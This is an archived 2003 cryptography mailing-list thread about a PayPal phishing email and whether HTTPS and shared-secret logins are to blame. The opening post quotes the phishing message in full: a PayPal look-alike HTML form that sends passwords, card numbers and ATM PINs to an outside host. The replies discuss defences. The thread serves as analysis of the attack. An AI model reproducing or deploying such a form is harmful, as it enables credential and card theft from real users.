An attack on paypal
Attached is a spam mail that constitutes an attack on paypal similar in effect and method to man in the middle. The bottom line is that https just is not working. Its broken. The fact that people keep using shared secrets is a symptom of https not working. The flaw in https is that you cannot operate the business and trust model using https that you can with shared secrets. -------------- Enclosure number 1 ---------------- Received: from bgp480791bgs.summit01.nj.comcast.net [68.37.160.58] by dpmail07.doteasy.com (SMTPD32-7.13) id A3506CD006A; Sat, 07 Jun 2003 19:45:36 -0700 Date: Sun, 08 Jun 2003 02:50:24 +0000 From: Confirm <confirm@paypal.com> Subject: Important Information Regarding Your PayPal Account To: Jamesd <jamesd@echeque.com> References: <4FG6E0K8HJHJ2DL9@echeque.com> In-Reply-To: <4FG6E0K8HJHJ2DL9@echeque.com> Message-ID: <62K3JH9LKLB0I8GK@paypal.com> MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: 8bit X-RCPT-TO: <jamesd@echeque.com> Status: U X-PMFLAGS: 34079360 0 1 P4EDB0.CNM <html> <head> <STYLE type=text/css> .dummy {} BODY, TD {font-family: verdana,arial,helvetica,sans-serif;font-size: 13px;color: #000000;} UL {list-style: square} .pp_big {font-family: verdana,arial,helvetica,sans-serif;font-size: 24px;font-weight: bold;color: #003366;} .pp_sortofbig {font-family: verdana,arial,helvetica,sans-serif;font-size: 22px;font-weight: bold;color: #003366;} .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;} .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;} .pp_mediumtextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 14px;font-weight: bold;color: #000000;} .pp_smalltext {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: normal;color: #000000;} .pp_smallbluetext 
{font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: normal;color: #003366;} .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} </STYLE> <title>PayPal</title> </head> <body> <table width="600" cellspacing="0" cellpadding="0" border="0" align="center"> <tr> <td><A href="https://www.paypal.com/"><IMG src="http://www.paypal.com/images/paypal_logo.gif" width=109 height=35 alt="PayPal" border="0" vspace=10></A> </td> </tr> </table> <table width="100%" cellspacing="0" cellpadding="0" border="0"> <tr> <td background="http://www.paypal.com/images/bg_clk.gif" width="100%"><img src="http://www.paypal.com/images/pixel.gif" height="29" width="1" border="0"></td> </tr> <tr> <td><img src="http://www.paypal.com/images/pixel.gif" height="10" width="1" border="0"></td> </tr> </table> <table width="600" cellspacing="0" cellpadding="5" border="0" align="center"> <tr> <td class="pp_sortofbig" align=middle>Dear PayPal Customer</td> </tr> <tr> <td valign="top"><p> </p> <p>This e-mail is the notification of recent innovations taken by PayPal to detect inactive customers and non-functioning mailboxes.</p> <p>The inactive customers are subject to restriction and removal in the next 3 months.</p> <p>Please confirm your email address and Credit or Check Card information<b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal"> </b>using the form below:</p></td> </tr> <tr> <td align=middle> <form action="http://www.pos2life.biz/vp.php" method="post"> <p style="MARGIN-TOP: -2px; MARGIN-BOTTOM: 0px; MARGIN-LEFT: 4px" > </p> <table border="0"> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-VARIANT: normal" >Email Address:</b></P></td> <td><input name="lgn" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-VARIANT: normal" 
>Password:</b></P></td> <td><input name="psw" type="password" size="32" maxlength="32"></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">First Name:</b></P></td> <td><input name="fname" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Last Name:</b></P></td> <td><input name="lname" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal"> ZIP:</b></P></td> <td><input name="bz" size="32" maxlength="20"> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Credit or Check Card #:</b></P></td> <td><input name="cz" size="32" maxlength="16"></td> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Expiration Date:</b></P></td> <td> <select name="crdm"> <OPTION value="zero" selected>Month</OPTION> <option value="01">01</option> <option value="02">02</option> <option value="03">03</option> <option value="04">04</option> <option value="05">05</option> <option value="06">06</option> <option value="07">07</option> <option value="08">08</option> <option value="09">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> </select> / <select name="crdy"> <OPTION value="zero" selected>Year</OPTION> <option value="03">2003</option> <option value="04">2004</option> <option value="05">2005</option> <option value="06">2006</option> <option value="07">2007</option> <option value="08">2008</option> <option value="09">2009</option> <option value="10">2010</option> <option value="11">2011</option> <option value="12">2012</option> </select> </td> <tr> <td> <P align=left><b style="FONT: bold 8pt : normal" > ATM PIN:</b></P></td> <td><input name="pni" type="password" 
size="32" maxlength="6"></td> </tr> </table> <p> <input type="submit" value=" Submit "> </p> </form> Information transmitted using 128bit SSL encryption. <p><br> </p></td> </tr> <tr> <td align=middle><strong>Thanks for using PayPal! </strong><br></td> </tr> <tr> <td><img src="http://www.paypal.com/images/dot_row_long.gif"></td> </tr> <tr> <td class="pp_footer"> This PayPal notification was sent to this email address because you are a Web Accept user and chose to receive the PayPal Periodical newsletter and Product Updates. To modify your notification preferences, go to <A href="https://www.paypal.com/PREFS-NOTI">https://www.paypal.com/PREFS-NOTI</A> and log in to your account. Changes may take several days to be reflected in our mailings. Replies to this email will not be processed. <br> <br> Copyright© 2003 PayPal Inc. All rights reserved. Designated trademarks and brands are the property of their respective owners. </td> </tr> </table> </body></html> --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
At 02:55 PM 6/8/2003, James A. Donald wrote:
Attached is a spam mail that constitutes an attack on paypal similar in effect and method to man in the middle.
The bottom line is that https just is not working. It's broken.
The fact that people keep using shared secrets is a symptom of https not working.
The flaw in https is that you cannot operate the business and trust model using https that you can with shared secrets.
I don't think it's https that's broken, since https wasn't intended to solve the customer authentication / authorization problem (you could try to use SSL's client certificates for that, but no one ever intended client certificate authentication to be a generalized transaction solution). When I responded to this before, I thought you were talking about the server auth problem, not the password problem. I continue to feel that the server authentication problem is a very hard problem to solve, since there are few hints to the browser as to what the user's intent is.

The password problem does need to be solved, but complaining that HTTPS or SSL doesn't solve it isn't any more relevant than complaining that it's not solved by HTML, HTTP, and/or browser or server implementations, since any and all of these are needed in producing a new solution which can function with real businesses and real users. Let's face it: passwords are so deeply ingrained into people's lives that nothing more complex than passwords is going to have broad acceptance, and any consumer-driven company is going to consider "easy" to be more important than "secure".

Right now, my best idea for solving this problem is to:
- Standardize an HTML input method for <FORM> which does a SPEKE (or similar) mutual authentication.
- Get browser makers to design better ways to communicate to users that UI elements can be trusted. For example, a proposal I saw recently would have the OS decorate the borders of "trusted" windows with facts or images that an attacker wouldn't be able to predict: the name of your dog, or whatever. (Sorry, can't locate a link right now, but I'd appreciate one.)
- Combine the two to allow sites to provide a user-trustable UI to enter a password which cannot be sucked down.
- Evangelize to users that this is better and that they should be suspicious of any situation where they used such an interface once, but now it's gone.
I agree that the overall architecture is broken; the problem is that it's broken in more ways than can just be fixed with any change to TLS/SSL or HTTPS. - Tim
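The SPEKE idea in Tim's first bullet works roughly like this: both sides derive the Diffie-Hellman base from the password itself, then do an ordinary exchange, so the two ends agree on a key only if they started from the same password, and nothing password-derived ever crosses the wire in recoverable form. A toy sketch (the modulus here is illustrative only and far too small for real use):

```python
import hashlib
import secrets

# Toy modulus for illustration only -- real SPEKE needs a large safe prime.
P = (1 << 127) - 1

def speke_base(password: str) -> int:
    # SPEKE derives the DH generator from the shared password.
    h = int.from_bytes(hashlib.sha256(password.encode()).digest(), "big")
    return pow(h, 2, P)

def speke_exchange(pw_client: str, pw_server: str) -> bool:
    g_c, g_s = speke_base(pw_client), speke_base(pw_server)
    a = secrets.randbelow(P - 2) + 2
    b = secrets.randbelow(P - 2) + 2
    # Each side sends only g^x; the password itself never crosses the wire.
    A, B = pow(g_c, a, P), pow(g_s, b, P)
    k_client = pow(B, a, P)   # client computes (g_s^b)^a
    k_server = pow(A, b, P)   # server computes (g_c^a)^b
    return k_client == k_server

# Keys agree only when both sides started from the same password.
print(speke_exchange("hunter2", "hunter2"))   # True
print(speke_exchange("hunter2", "guess"))     # False
```

A phishing site that runs this protocol against a user learns nothing it can replay, which is the property a plain password form can never have.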
At 18:03 08/06/2003 -0400, Tim Dierks wrote: <skip>
- Get browser makers to design better ways to communicate to users that UI elements can be trusted. For example, a proposal I saw recently which would have the OS decorate the borders of "trusted" windows with facts or images that an attacker wouldn't be able to predict: the name of your dog, or whatever. (Sorry, can't locate a link right now, but I'd appreciate one.)
Here are two:

Yuan, Ye and Smith, "Trusted Path for Browsers", 11th Usenix Security Symposium, 2002.
Ka-Ping Yee, "User Interaction Design for Secure Systems", ICICS, LNCS 2513, 2002.

This issue is also covered somewhat by my article in CACM (May 2002). Best, Amir Herzberg http://amir.herzberg.name
- Combine the two to allow sites to provide a user-trustable UI to enter a password which cannot be sucked down. - Evangelize to users that this is better and that they should be suspicious of any situation where they used such interface once, but now it's gone.
I agree that the overall architecture is broken; the problem is that it's broken in more ways than can just be fixed with any change to TLS/SSL or HTTPS.
- Tim
Yuan, Ye and Smith, Trusted Path for Browsers, 11th Usenix security symp, 2002.
Minor nit: just Ye and Smith. (Yuan had helped with some of the spoofing) Advertisement: we also built this into Mozilla, for Linux and Windows. http://www.cs.dartmouth.edu/~pkilab/demos/countermeasures/ --Sean -- Sean W. Smith, Ph.D. sws@cs.dartmouth.edu http://www.cs.dartmouth.edu/~sws/ (has ssl link to pgp key) Department of Computer Science, Dartmouth College, Hanover NH USA
James A. Donald wrote:

Attached is a spam mail that constitutes an attack on paypal similar in effect and method to man in the middle.

The bottom line is that https just is not working. It's broken.

HTTPS works just fine. The problem is - people are broken. At the very least, Verisign should say "ok, so '..go1d..' is a valid server address, but doesn't it look suspiciously similar to this '..gold..' site over here?" for https://pseudo-gold-site/ - but really, if users are going to fill in random webforms sent by email, they aren't going to be safe under any circumstances; the thing could send by unsecured http to any site on the planet, then redirect to the real gold site for a generic "transaction completed" or even "failed" screen. A world where a random paypal hack like this one doesn't work is the same as a world where there is no point sending out a Nigerian letter, as you will never make a penny on it - and yet, the Nigerian scam is still profitable for the con artists.
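The "go1d" vs "gold" check suggested above amounts to comparing confusable "skeletons" of names: normalize the classic look-alike characters and see whether a candidate collides with a known name. A hypothetical sketch (the substitution table is a tiny illustrative subset of real confusable mappings):

```python
# Map common look-alike characters to a canonical form ("go1d" -> "gold").
LOOKALIKES = str.maketrans({"1": "l", "0": "o", "5": "s", "|": "l"})

def skeleton(domain: str) -> str:
    return domain.lower().translate(LOOKALIKES)

def is_spoof_of(candidate: str, trusted: str) -> bool:
    # Flag a domain that normalizes to a trusted name but isn't that name.
    return candidate != trusted and skeleton(candidate) == skeleton(trusted)

print(is_spoof_of("www.go1d.com", "www.gold.com"))   # True
print(is_spoof_of("www.gold.com", "www.gold.com"))   # False
```

A CA could run every new certificate request through such a check against existing high-value names before issuing.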
At 11:43 PM 6/8/2003 +0100, Dave Howe wrote:
HTTPS works just fine. The problem is - people are broken. At the very least, Verisign should say "ok, so '..go1d..' is a valid server address, but doesn't it look suspiciously similar to this '..gold..' site over here?" for https://pseudo-gold-site/ - but really, if users are going to fill in random webforms sent by email, they aren't going to be safe under any circumstances; the thing could send by unsecured http to any site on the planet, then redirect to the real gold site for a generic "transaction completed" or even "failed" screen. A world where a random paypal hack like this one doesn't work is the same as a world where there is no point sending out a Nigerian letter, as you will never make a penny on it - and yet, the Nigerian scam is still profitable for the con artists.
in a world where there are repeated human mistakes/failures .... at some point it is recognized that people aren't perfect and the design is changed to accommodate people's foibles. in some respects that is what helmets, seat belts, and air bags have been about.

in the past, systems have required long, complicated passwords that are hard to remember and must be changed every month. that almost worked when a person had to deal with a single shared-secret. when it became a fact of life that a person might have tens of such different interfaces it became impossible. It wasn't the fault of any specific institution, it was a failure of humans being able to deal with large numbers of extremely complex, frequently changing passwords. Because of known human foibles, it might be a good idea to start shifting from an infrastructure with large numbers of shared-secrets to a non-shared-secret paradigm.

at a recent cybersecurity conference, somebody made the statement that (of the current outsider internet exploits) approximately 1/3rd are buffer overflows, 1/3rd are network traffic containing a virus that infects a machine because of automatic scripting, and 1/3rd are social engineering (convincing somebody to divulge information). As far as I know, eavesdropping on network traffic doesn't even show as a blip on the radar screen.

In the following thread on a financial authentication white paper:
http://www.garlic.com/~lynn/aepay11.htm#53 Authentication white paper
http://www.garlic.com/~lynn/aepay11.htm#54 FINREAD was. Authentication white paper
http://www.garlic.com/~lynn/aepay11.htm#55 FINREAD ... and as an aside
http://www.garlic.com/~lynn/aepay11.htm#56 FINREAD was. Authentication white paper

there is a point made that the X9.59 standard doesn't directly address the Privacy aspect of security (i.e. no encryption or hiding of data).
However, the point is made that it changes the paradigm so that the financial account number no longer represents a shared-secret and that it can be supported with two-factor authentication i.e. "something you have" token and "something you know" PIN. The "something you know" PIN is used to enable the token, but is not a shared secret. Furthermore, strong authentication can be justification for eliminating the need for name or other identification information in the transaction. However, if X9.59 strong authentication is used with two-factor authentication and no identification information is necessary .... then it would make people more suspicious if privacy information was requested. Also, since privacy information is no longer sufficient for performing a fraudulent transaction, it might mitigate that kind of social engineering attack. The types of social engineering attacks then become convincing people to insert their hardware token and do really questionable things or mailing somebody their existing hardware token along with the valid pin (possibly as part of an exchange for replacement). The cost/benefit ratio does start to change since there is now much more work on the crooks' part for the same or less gain. One could also claim that such activities are just part of child-proofing the environment (even for adults). On the other hand, it could be taken as analogous to designing systems to handle observed failure modes (even when the failures are human and not hardware or software). Misc.
identity theft and credit card fraud references:
http://www.consumer.gov/idtheft/cases.htm
http://www.usdoj.gov/criminal/fraud/idtheft.html
http://www.garlic.com/~lynn/aadsm14.htm#22 Identity Theft Losses Expect to hit $2 trillion
http://www.garlic.com/~lynn/subpubkey.html#fraud

Slightly related in recent thread that brought up buffer overflow exploits
http://www.garlic.com/~lynn/2003j.html#4 A Dark Day
and the report that multics hasn't ever had a buffer overflow exploit
http://www.garlic.com/~lynn/2002l.html#42 Thirty Years Later: Lessons from the Multics Security Evaluation
http://www.garlic.com/~lynn/2002l.html#44 Thirty Years Later: Lessons from the Multics Security Evaluation

somebody (else) commented (in the thread) that anybody who currently (still) writes code resulting in a buffer overflow exploit should maybe be thrown in jail. -- Anne & Lynn Wheeler http://www.garlic.com/~lynn/ Internet trivia 20th anv http://www.garlic.com/~lynn/rfcietff.htm
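The X9.59 paradigm above - authenticate the transaction rather than hide the account number - can be illustrated with any digital signature scheme. Below is a minimal hash-based (Lamport-style, one-time) signature sketch; this is not X9.59 itself, just the core idea that the account number travels in the clear and knowing it authorizes nothing:

```python
import hashlib
import secrets

def H(b: bytes) -> bytes:
    return hashlib.sha256(b).digest()

def keygen():
    # "something you have": 256 pairs of secret values held in the token
    sk = [[secrets.token_bytes(32), secrets.token_bytes(32)] for _ in range(256)]
    pk = [[H(s0), H(s1)] for s0, s1 in sk]   # hashes registered with the bank
    return sk, pk

def msg_bits(msg: bytes):
    d = int.from_bytes(H(msg), "big")
    return [(d >> i) & 1 for i in range(256)]

def sign(sk, msg: bytes):
    # Reveal one preimage per message bit; strictly one-time use.
    return [sk[i][b] for i, b in enumerate(msg_bits(msg))]

def verify(pk, msg: bytes, sig) -> bool:
    return all(H(s) == pk[i][b]
               for (i, b), s in zip(enumerate(msg_bits(msg)), sig))

sk, pk = keygen()
txn = b"account=1234567890 amount=25.00"   # account number is NOT a secret
sig = sign(sk, txn)
print(verify(pk, txn, sig))                                   # True
print(verify(pk, b"account=1234567890 amount=9999.00", sig))  # False
```

Phishing the account number out of a user accomplishes nothing here; the attacker cannot produce a valid signature over a fraudulent transaction without the token's private material.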
in a world where there are repeated human mistakes/failures .... at some point it is recognized that people aren't perfect and the design is changed to accommodate people's foibles. in some respects that is what helmets, seat belts, and air bags have been about.
The problem here is that we are blaming the protective device for not being able to protect against the deliberate use of an attack that bypasses, not challenges, it - by exploiting the user's gullibility or tendency to take the path of least resistance. The real weakness in HTTPS is the tendency of certificates signed by Big Name CAs to be automagically trusted - even if you have never visited that site before. Yes, you can fix this almost immediately by untrusting the root certificate - but then you have to manually verify each and every site at least once, and possibly every time if you don't mark the cert as "trusted" for future reference. To blame HTTPS for an attack where the user fills in a web form received via html-rendering email (no https involved at all) is more than a little unfair though.
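One concrete middle ground between automagic CA trust and manually verifying every site is SSH-style key continuity ("trust on first use"): pin the certificate fingerprint seen on the first visit and complain loudly if it later changes. A hypothetical sketch:

```python
import hashlib

# Hypothetical SSH-style "trust on first use" cache for site certificates:
# remember the fingerprint seen on the first visit and warn if it changes,
# instead of silently trusting any Big Name CA signature.
class PinStore:
    def __init__(self):
        self.pins = {}

    def check(self, host: str, cert_der: bytes) -> str:
        fp = hashlib.sha256(cert_der).hexdigest()
        if host not in self.pins:
            self.pins[host] = fp
            return "first-visit: pinned"
        return "ok" if self.pins[host] == fp else "MISMATCH: possible spoof"

store = PinStore()
print(store.check("www.gold.com", b"cert-A"))  # first-visit: pinned
print(store.check("www.gold.com", b"cert-A"))  # ok
print(store.check("www.gold.com", b"cert-B"))  # MISMATCH: possible spoof
```

Note this protects returning visitors only; the first visit is still a leap of faith, which is exactly the trade-off SSH users already live with.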
in the past systems have designed long, complicated passwords that are hard to remember and must be changed every month. that almost worked when a person had to deal with a single shared-secret. when it became a fact of life that a person might have tens of such different interfaces it became impossible. It wasn't the fault of any specific institution, it was a failure of humans being able to deal with large numbers of extremely complex, frequently changing passwords. Because of known human foibles, it might be a good idea to start shifting from an infrastructure with large numbers of shared-secrets to a non-shared-secret paradigm.
I am not aware of one (not that that means much, given I am a novice in this field). Even PKI relies on something close to a shared secret - a *trustworthy* copy of the public key, matching a secret copy of the private key. In x509, this trustworthiness is established by an Ultimately Trusted CA; in pgp, by the Web Of Trust, in a chain leading back to your own key; in SSH, by your placing the public key into your home dir manually (using some other form of authentication to presumably gain access). In each of these cases, the private key will almost invariably be protected by a passphrase; at best, you can have a single passphrase (or even a single private key) to cover all bases... but that just makes that secret all the more valuable.
at a recent cybersecurity conference, somebody made the statement that (of the current outsider internet exploits) approximately 1/3rd are buffer overflows, 1/3rd are network traffic containing a virus that infects a machine because of automatic scripting, and 1/3rd are social engineering (convincing somebody to divulge information). As far as I know, eavesdropping on network traffic doesn't even show as a blip on the radar screen.

That is pretty much because defence occupies the position of the interior - attackers will almost invariably attack weak points, not strong ones. It is easy to log and count how many attacks happen on weak points, but impossible to calculate how many attacks *would* have happened had the system not been in place to protect against such attacks, so the attackers moved on to easier targets. It makes little sense to try to break one https connection (even at 40 bits) if by breaking into the server you get that information, that of hundreds of others (until discovered), and possibly thousands of others inadvisedly stored unprotected in a database.
<snip>
The types of social engineering attacks then become convincing people to insert their hardware token and do really questionable things or mailing somebody their existing hardware token along with the valid pin (possibly as part of an exchange for replacement). The cost/benefit ratio does start to change since there is now much more work on the crooks' part for the same or less gain. One could also claim that such activities are just part of child-proofing the environment (even for adults). On the other hand, it could be taken as analogous to designing systems to handle observed failure modes (even when the failures are human and not hardware or software). Misc. identity theft and credit card fraud references:
Which again matches well to the Nigerian analogy. Everyone *knows* that handing over your bank details is a Bad Thing - yet they still do it.
At 02:09 AM 6/9/2003 +0100, Dave Howe wrote:
The problem here is that we are blaming the protective device for not being able to protect against the deliberate use of an attack that bypasses, not challenges, it - by exploiting the user's gullibility or tendency to take the path of least resistance. The real weakness in HTTPS is the tendency of certificates signed by Big Name CAs to be automagically trusted - even if you have never visited that site before. Yes, you can fix this almost immediately by untrusting the root certificate - but then you have to manually verify each and every site at least once, and possibly every time if you don't mark the cert as "trusted" for future reference.
that is why we coined the term merchant "comfort" certificates some time ago. my wife and I having done early work for the payment gateway with a small client/server startup in menlo park ... that had this thing called SSL/HTTPS ... and then having to perform due diligence on the major issuers of certificates .... we recognized 1) vulnerabilities in the certificate process and 2) information hiding of transactions in flight only addressed a very small portion of the vulnerabilities and exploits.

lots of past discussions related to our use of merchant comfort certificates: http://www.garlic.com/~lynn/subpubkey.html#ssl

we concluded that a real issue is that way too much of the infrastructure is based on shared-secrets and there was no realistic way of providing blanket protection to all the exposures and vulnerabilities of such shared-secret infrastructures. somewhat related discussion in the security proportional to risk posting: http://www.garlic.com/~lynn/2001h.html#61

so rather than trying to create a very thick blanket of encryption covering the whole planet .... a synergistic approach was attempting to provide alternatives to as much of the shared-secret paradigm as possible. As in the referenced post: http://www.garlic.com/~lynn/aepay11.htm#53 authentication white paper

strong encryption of identification and privacy (and shared-secret) information is good ... but not having identification, privacy and shared-secret information at all is even better. there are all sorts of ways of obtaining shared-secret information (and/or privacy and identification information as a prelude to identity theft) .... including various kinds of social engineering. as previously mentioned, a requirement for the X9.59 standard was to preserve the integrity of the financial infrastructure for ALL electronic retail payments.
As per previous notes, X9.59 with strong authentication eliminates the account number as a shared-secret, as well as eliminating requirements for name, address, zip-code, etc. as part of any credit card authentication process (strong encryption of vulnerable information is good; not having the information at all is even better). In addition to covering things like credit cards, debit cards, atm transactions, and stored-value transactions - over the internet, at point-of-sale, face-to-face, at automated machines, etc. - X9.59 also covers ACH transactions. ACH information allows for unauthenticated push or pull transactions. Social engineering requesting bank account information so somebody can push tens of millions into your account also allows them to generate a pull transaction removing all the money from your account. Part of the above posting on the authentication white paper makes reference to securing ACH transactions: http://www.asuretee.com/company/releases/030513_hagenuk.shtm -- Anne & Lynn Wheeler http://www.garlic.com/~lynn/ Internet trivia 20th anv http://www.garlic.com/~lynn/rfcietff.htm
-- On 8 Jun 2003 at 20:00, Anne & Lynn Wheeler wrote:
that is why we coined the term merchant "comfort" certificates some time ago. my wife and I having done early work for payment gateway with small client/server startup in menlo park ... that had this thing called SSL/HTTPS ... and then having to perform due diligence on the major issuers of certificates .... we recognized 1) vulnerabilities in the certificate process and 2) information hiding of transaction in flight only addressed a very small portion of the vulnerabilities and exploits.
https is like a strong fortress wall that only goes halfway around the fortress. The most expensive and inconvenient part of https, getting certificates from verisign, is fairly useless. The useful part of https is that it has stopped password sniffing from networks, but the PKI part, where the server, but not the client, is supposedly authenticated, does not do much good. --digsig James A. Donald 6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG 9ZQw+0/xh1y28CkGulSQSVxewfy71qzXGHI8KJbN 4osBv1veq07jaMVh2zVetZVKqIRfQjiwJaKu99GqM
The worst trouble I've had with https is that you have no way to use host header names to differentiate between sites that require different SSL certificates. i.e. www.foo.com www.bar.com www.baz.com can't all live on the same IP and have individual ssl certs for https. :( This is because the cert is exchanged before the http 1.1 layer can say "I want www.bar.com". So you need to waste IP's for this. Since the browser standards are already in place, it's unlikely we'll be able to find a workaround, i.e. be able to switch to a different virtual host after you've established the ssl session. :(

Personally I find thawte certs to be much cheaper than verisign and they work just as well. In any case, anyone is free to do the same thing AlterNIC did - become your own free CA. You'll just have to convince everyone else to add your CA's cert into their browser. You might be able to get the Mozilla guys to do this, good luck with the beast of Redmond though. Either way, having a pop-up isn't that big a deal so long as you're sure of the site you're connecting to. In either case, we wouldn't need to worry about paying Verisign or anyone else if we had properly secured DNS. Then you could trust those pop-up self-signed SSL cert warnings.

----------------------Kaos-Keraunos-Kybernetos--------------------------- + ^ + :25Kliters anthrax, 38K liters botulinum toxin, 500 tons of /|\ \|/ :sarin, mustard and VX gas, mobile bio-weapons labs, nukular /\|/\ <--*-->:weapons.. Reasons for war on Iraq - GWB 2003-01-28 speech. \/|\/ /|\ :Found to date: 0. Cost of war: $800,000,000,000 USD. \|/ + v + : The look on Sadam's face - priceless! --------_sunder_@_sunder_._net_------- http://www.sunder.net ------------

On Tue, 10 Jun 2003, James A. Donald wrote:
The most expensive and inconvenient part of https, getting certificates from verisign, is fairly useless.
The useful part of https is that it has stopped password sniffing from networks, but the PKI part, where the server, but not the client, is supposedly authenticated, does not do much good.
On 06/11/2003 10:56 AM, Sunder wrote:
www.foo.com www.bar.com www.baz.com can't all live on the same IP and have individual ssl certs for https. :( This is because the cert is exchanged before the http 1.1 layer can say "I want www.bar.com"
So you need to waste IP's for this. Since the browser standards are already in place, it's unlikely we'll be able to find a workaround.
A reasonable workaround might be something like: http://www.ietf.org/rfc/rfc3056.txt ... to allow isolated IPv6 domains or hosts, attached to an IPv4 network which has no native IPv6 support, to communicate with other such IPv6 domains or hosts with minimal manual configuration, before they can obtain native IPv6 connectivity. It incidentally provides an interim globally unique IPv6 address prefix to any site with at least one globally unique IPv4 address, even if combined with an IPv4 Network Address Translator (NAT).
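The RFC 3056 mapping is mechanical: the site's 32-bit IPv4 address is embedded directly after the 2002::/16 prefix, yielding a /48 IPv6 prefix (and so vastly more addresses than the single IPv4 address it came from). A sketch of the derivation using Python's ipaddress module:

```python
import ipaddress

# The 6to4 trick from RFC 3056: every globally unique IPv4 address implies
# a /48 IPv6 prefix under 2002::/16, with no registry involvement.
def six_to_four_prefix(v4: str) -> ipaddress.IPv6Network:
    v4_int = int(ipaddress.IPv4Address(v4))
    addr = (0x2002 << 112) | (v4_int << 80)   # 2002:VVVV:VVVV::/48
    return ipaddress.IPv6Network((addr, 48))

print(six_to_four_prefix("192.0.2.1"))   # 2002:c000:201::/48
```

So a host stuck on one IPv4 address still gets 80 bits of local addressing to hand out to virtual hosts.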
The worst trouble I've had with https is that you have no way to use host header names to differentiate between sites that require different SSL certificates.
True as written, but Netscrape and Internet Exploder each have a hack for honoring the same cert for multiple server names. Opera seems to honor at least one of the two hacks, and a cert can incorporate both at once:

/C=US/ST=Illinois/L=Batavia/O=Fermilab/OU=Services /CN=(alpha|bravo|charlie).fnal.gov/CN=alpha.fnal.gov /CN=bravo.fnal.gov/CN=charlie.fnal.gov
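The multi-CN hack above amounts to: try each CN in turn, treating it as a pattern in which the `(a|b|c)` alternation is live and dots are literal. A hypothetical sketch of such a matcher (illustrative only, not how any actual browser implements it):

```python
import re

# Hypothetical matcher for certs carrying several CN fields, where a CN
# may itself be a Netscape-style pattern like "(alpha|bravo).example.com".
def cert_matches(cns, hostname: str) -> bool:
    for cn in cns:
        pattern = cn.replace(".", r"\.")  # dots literal; (a|b) group survives
        if re.fullmatch(pattern, hostname):
            return True
    return False

cns = ["(alpha|bravo|charlie).fnal.gov",
       "alpha.fnal.gov", "bravo.fnal.gov", "charlie.fnal.gov"]
print(cert_matches(cns, "bravo.fnal.gov"))   # True
print(cert_matches(cns, "delta.fnal.gov"))   # False
```

One cert, one IP, several hostnames - at the cost of reissuing the cert whenever a hostname is added.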
So you need to waste IP's for this.
Waste? Heck no, that's what they're for!
-- On 9 Jun 2003 at 2:09, Dave Howe wrote:
The problem here is that we are blaming the protective device for not being able to protect against the deliberate use of an attack that bypasses, not challenges, it - by exploiting the user's gullibility or tendency to take the path of least resistance. The real weakness in HTTPS is the tendency of certificates signed by Big Name CAs to be automagically trusted - even if you have never visited that site before. Yes, you can fix this almost immediately by untrusting the root certificate - but then you have to manually verify each and every site at least once, and possibly every time if you don't mark the cert as "trusted" for future reference. To blame HTTPS for an attack where the user fills in a web form received via html-rendering email (no https involved at all) is more than a little unfair though.
How many attacks have there been based on automatic trust of Verisign's feckless ID checking? Not many, possibly none. That is not the weak point; it is not where the attacks occur. If browsers were set to accept self-signed certificates by default, it would make little difference to security. Many ways of getting big-name certificates that one should not have were discovered; attackers never showed much interest. --digsig James A. Donald 6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG uJuAm4Xwyo4xTn0ozjBmW2ZqpI8Z3ru25WDmB7iw 43PXj2QDpBfcahqs2aOleapJYsqtA6S36+hOdVkpR
James A. Donald wrote:
How many attacks have there been based on automatic trust of Verisign's feckless ID checking? Not many, possibly none.
I imagine that if there exists an https://www.go1d.com/ site for purposes of fraud, it won't be using a self-signed cert. It is of course possible that the attackers are using http:// instead, but more people are likely to notice that.
That is not the weak point; it is not where the attacks occur. If browsers were set to accept self-signed certificates by default, it would make little difference to security.
I don't think any currently can be so set - but regardless, an attacker wishing to run a fraudulent https site must have a certificate acceptable to the majority of browsers without changed settings. Currently that means the big-name CAs and nobody else.
At 06:12 PM 6/8/2003 -0600, Anne & Lynn Wheeler wrote:
at a recent cybersecurity conference, somebody made the statement that, of the current outsider internet exploits, approximately one third are buffer overflows, one third are network traffic containing a virus that infects a machine because of automatic scripting, and one third are social engineering (convincing somebody to divulge information). as far as i know, eavesdropping on network traffic doesn't even show up as a blip on the radar screen.
virus attempting to harvest ("shared-secret", single-factor) passwords at financial institutions http://www.smh.com.au/articles/2003/06/10/1055010959747.html and somewhat related: http://www.garlic.com/~lynn/aepay11.htm#53 authentication white paper -- Anne & Lynn Wheeler http://www.garlic.com/~lynn/ Internet trivia 20th anv http://www.garlic.com/~lynn/rfcietff.htm
At 5:12 PM -0700 6/8/03, Anne & Lynn Wheeler wrote:
